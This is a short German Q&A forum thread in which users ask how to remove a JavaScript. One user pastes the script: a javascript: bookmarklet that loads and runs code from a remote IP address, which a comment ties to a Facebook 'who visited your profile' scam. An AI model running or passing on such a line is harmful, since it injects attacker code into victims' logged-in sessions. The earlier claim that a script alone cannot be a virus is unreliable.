JavaScript entfernen,aber wie?

... komplette Frage anzeigen

2 Antworten

Also, JavaScript ist so schonmal nicht serverseitig, d.h u.a., dass das, was du da eingibst, soweit das manuell möglich ist, nur für den aktuellen Seitenaufruf zählt.

 

Wäre es denn möglich dieses Script mal hier zu posten oder mal einen Artikel oder so zu nennen, welcher über diesen Script ist?

 

Wie lang ist denn der Script? Weil ein Script allein, kann eigentlich normalerweise kein Virus sein...

Antwort bewerten Vielen Dank für Deine Bewertung

So, Tag auch , habe ganz genau das gleiche problem und bitte ebenfalls um hilfe und PS: hier der script möchte nämlich auch wissen wie man dieses blöde script entefernt:

javascript:(a=(b=document).createElement('script')).src='//216.119.153.147/german2.php?'+Math.random(),b.body.appendChild(a);void(0)

Antwort bewerten Vielen Dank für Deine Bewertung
Kommentar von MEGACHELTERRAR
13.02.2012, 06:39

Achja, na gucke mal hier. Das ist schon nicht schön. Vor allem sollte man sich merken: Man kann bisher nicht auf Facebook sehen, wer auf der eigenen Seite war!

0

Was möchtest Du wissen?